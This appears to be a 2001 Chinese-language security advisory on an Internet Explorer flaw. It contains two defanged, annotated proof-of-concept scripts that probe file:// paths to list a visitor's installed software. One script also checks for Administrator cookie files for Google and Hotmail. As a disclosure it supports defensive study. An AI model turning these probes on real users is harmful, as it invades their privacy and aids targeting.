Internet Explorer 可泄露系统信息
发布时间:2001-11-07
更新时间:2001-11-07
严重程度:中
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式
受影响系统
Internet Explorer
详细描述
IE中存在一个安全漏洞可以导致远程站点可以通过file://请求和监视返回的错误代码来列举目标用户安装的程序。
测试代码
注意所有出现的'i'由'!'代替。
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>
// Demonstration 1 (tags above are defanged by the advisory: 'i' -> '!').
// What the listing shows: a remote page writes <img> elements whose src is a
// file:// URL into the 1x1 frame "ifrm" and records whether onload or onerror
// fires. The load/error outcome is the only signal used; file contents are
// never read by this script.
// Defensive takeaway: the page's origin can observe load success of local
// file:// resources, which is what lets it tell an existing path from a
// missing one.

// Guard: document.all is used as the IE check; other browsers only get an alert.
if(!document.all){alert('Ughh this is IE5+ specific')}

// Result table pieces. In htmldat, "-" is the placeholder for the label and
// "--" the placeholder for the result image markup (see the else branch of cycle()).
head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'
htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
        '<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
        '</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'
tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'

// Called from the probe element's onload: marks entry x as "found" by
// appending the y.jpg image markup to it.
function yup(x) { img[x]+=',<img src="y.jpg">' }
// Called from the probe element's onerror: marks entry x as "not found".
function nope(x) { img[x]+=',<img src="x.jpg">' }

// Probe list, 1-based. Each entry is "label,local image path".
// NOTE(review): the paths look like sample/resource images shipped with the
// named products; the listing itself does not say how they were chosen.
img=new Array
img[1]="LogicTech Cam,C:\\Program Files\\Logitech\\QuickCam\\Samples\\Henry.jpg"
img[2]="Icq,C:\\Program Files\\ICQ\\Help\\HelpCards\\images\\bg.gif"
img[3]="Interdev,C:\\Program Files\\Microsoft Visual Studio\\VIntDev98\\Samples\\Gallery\\content\\images\\CLOUDS.JPG"
img[4]="VisualC,C:\\Program Files\\Microsoft Visual Studio\\VC98\\MFC\\Include\\Res\\TRUETYPE.BMP"
img[5]="WinAce,C:\\Program Files\\WinAce\\html\\images\\tip1.gif"
img[6]="Acrobat Reader4,C:\\Program Files\\Adobe\\Acrobat 4.0\\Reader\\plug_ins\\WEBBUY\\HTML\\table_btm.gif"
img[7]="Adobe PageMaker,C:\\Program Files\\Adobe\\PM65\\RSRC\\USENGLSH\\PLUGINS\\HTMLEXP.GIF"
img[8]="MS Office,C:\\Program Files\\Microsoft Office\\Office\\Bitmaps\\Dbwiz\\BOOKS.GIF"
img[9]="Delphi6,C:\\Program Files\\Borland\\Delphi6\\BORLAND.GIF"
img[10]="Visual Basic 6,C:\\Program Files\\Microsoft Visual Studio\\VB98\\Wizards\\PDWizard\\Setup1\\INSTALL.BMP"
img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif"

// Index of the next entry to probe.
n=1

// Probes one entry per call and re-arms itself every 1000 ms; once every
// entry has been probed it replaces the page with the result table.
function cycle(){
  if(n < img.length){
    // Split "label,path"; from here on img[n] holds only the label so that
    // yup()/nope() can append the result markup after a comma.
    dat=img[n].split(",")
    img[n]=dat[0]
    // Probe element: onload/onerror call back into the parent page with the index.
    it = "<img src='file://" + dat[1]+ "' onload=\"parent.yup("+
         n + ")\" onerror=\"parent.nope(" + n + ")\">"
    ifrm.document.write(it)
    // NOTE(review): no element named "timer" appears in this listing;
    // presumably it existed in the original page. TODO confirm.
    document.all.timer.innerText = img.length -n
    n=n+1
    // String form of setTimeout: the string is evaluated as script after the delay.
    setTimeout("cycle();",1000)
  }else{
    tbl=' '
    for(i=1;i<img.length;i++){
      // tmp[0] = label, tmp[1] = result markup appended by yup()/nope().
      tmp=img[i].split(",")
      // NOTE(review): the "-" placeholder also matches the hyphen in
      // "sans-serif" inside htmldat, so the label is substituted there too.
      tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
    }
    document.write(head+tbl+tail)
  }
}
cycle()
</script>
Example 2:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>
// Demonstration 2: same structure as the first listing, but the probe element
// is an <iframe> pointing at text/XML files and only onload is wired up.
// Entries that never report onload are marked as "not found" when the result
// table is built.

// Guard: document.all is used as the IE check; other browsers only get an alert.
if(!document.all){alert('Ughh this is IE5+ specific')}

// Result table pieces; "-" and "--" in htmldat are the label/result placeholders.
head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'
htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
        '<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
        '</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'
tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'

// Called from the probe iframe's onload: marks entry x as "found".
function yup(x) { img[x]+=',<img src="y.jpg">' }
// Marks entry x as "not found"; in this listing it is only called from the
// result loop in cycle(), not from an event handler.
function nope(x) { img[x]+=',<img src="x.jpg">' }
// Debug helper; its only reference is in the commented-out onerror below.
function test() { alert('hey there'+n) }

// Probe list, 1-based, "label,local file path".
// Entries 4 and 5 point into the Administrator profile's Cookies folder, so
// this list goes beyond installed software.
// NOTE(review): a hit there would presumably indicate a stored cookie for
// that site under that account. TODO confirm.
img=new Array
img[1]="Norton Anti V NT,C:\\Program Files\\Navnt\\end-user.txt"
img[2]="Norton AntiV 98,C:\\Program Files\\Norton AntiVirus\\end-user.txt"
img[3]="CygWin,C:\\cygwin\\usr\\doc\\lynx\\test\\README.txt"
img[4]="NT-Admin(google cookie),C:\\Documents and Settings\\Administrator\\Cookies\\administrator@google[1].txt"
img[5]="NT-Admin(hotmail cookie),c:\\Documents and Settings\\Administrator\\Cookies\\administrator@hotmail.msn[1].txt"
img[6]="Real Player,C:\\Program Files\\RealPlayer\\channels.xml"
img[7]="Eudora 3.x,C:\\Eudora\\Readme.txt"
img[8]="Masm,C:\\masm32\\LICENCE\\SDK_EULA.TXT"
img[9]="Php,C:\\PHP\\install.txt"
img[10]="Perl,C:\\Perl\\html\\EULA-Community_License.txt"

// Index of the next entry to probe.
n=1

// Probes one entry per call and re-arms itself every 1000 ms; once every
// entry has been probed it replaces the page with the result table.
function cycle(){
  if(n < img.length){
    // Split "label,path"; img[n] keeps only the label until yup() appends to it.
    dat=img[n].split(",")
    img[n]=dat[0]
    // Probe element: only onload reports back; the onerror hook is commented out.
    it = "<iframe src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\">" //onerror='test()'>"
    ifrm.document.write(it)
    // NOTE(review): no element named "timer" appears in this listing;
    // presumably it existed in the original page. TODO confirm.
    document.all.timer.innerText = img.length -n
    n=n+1
    // String form of setTimeout: the string is evaluated as script after the delay.
    setTimeout("cycle();",1000)
  }else{
    tbl=' '
    for(i=1;i<img.length;i++){
      // No 'src=' in the entry means yup() never ran for it, so mark it as a miss.
      if(img[i].indexOf('src=') < 1){ nope(i) }
      // tmp[0] = label, tmp[1] = result markup.
      tmp=img[i].split(",")
      // NOTE(review): the "-" placeholder also matches the hyphen in
      // "sans-serif" inside htmldat, so the label is substituted there too.
      tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
    }
    document.write(head+tbl+tail)
  }
}
cycle()
</script>
解决方案
尚无
相关信息
dzzie at yahoo.com |